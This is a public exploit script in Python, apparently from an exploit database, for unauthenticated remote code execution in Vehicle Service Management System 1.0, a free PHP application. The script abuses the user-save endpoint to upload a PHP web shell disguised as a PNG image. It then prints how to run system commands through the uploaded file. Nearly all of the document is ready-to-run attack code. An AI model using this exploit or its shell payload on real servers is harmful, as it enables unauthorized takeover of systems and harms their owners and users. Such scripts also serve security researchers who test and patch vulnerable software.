# Exploit Title: Vehicle Service Managment 1.0 - RCE (Unauthenticated) 
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10

import requests

HOST="http://localhost"
UPLOAD_URL="/vehicle_service/classes/Users.php?f=save"

s = requests.Session()

def sendShell():
    payload = "<?php system($_GET['c']);?>"
    
    data = {
        "id":"1",
        "firstname":"Adminstrator",
        "lastname":"fake",
        "username":"fake",
        "password":"fake"              
    }

    filedata = {"img":("shell.php",payload, 
                    "image/png", {"Content-Disposition": "form-data"}
                  ) }

    prox = {"http":"http://127.0.0.1:8080"}

    r = s.post(f"{HOST}{UPLOAD_URL}", data=data, proxies=prox, files=filedata)
    if (r.status_code == 200):
        print("[+] Shell upload successful")
        print(f"[-] Check in {HOST}/vehicle_service/uploads/ for the shell")
        print(f"[-] Usage: *shell.php?c=id")
        print("[-] Ie: http://localhost/vehicle_service/uploads/{SERVERTIME}_shell.php?c=whoami")

def banner():
    return r"""
 __      _______ __  __   __   ___  
 \ \    / / ____|  \/  | /_ | / _ \ 
  \ \  / / (___ | \  / |  | || | | |
   \ \/ / \___ \| |\/| |  | || | | |
    \  /  ____) | |  | |  | || |_| |
     \/  |_____/|_|  |_|  |_(_)___/ 
                                    
                                    """

print(banner())
print("Vehicle Service Managment 1.0 RCE ~ Created by Richard Jones")
print("[+] Trying shell upload")    
sendShell()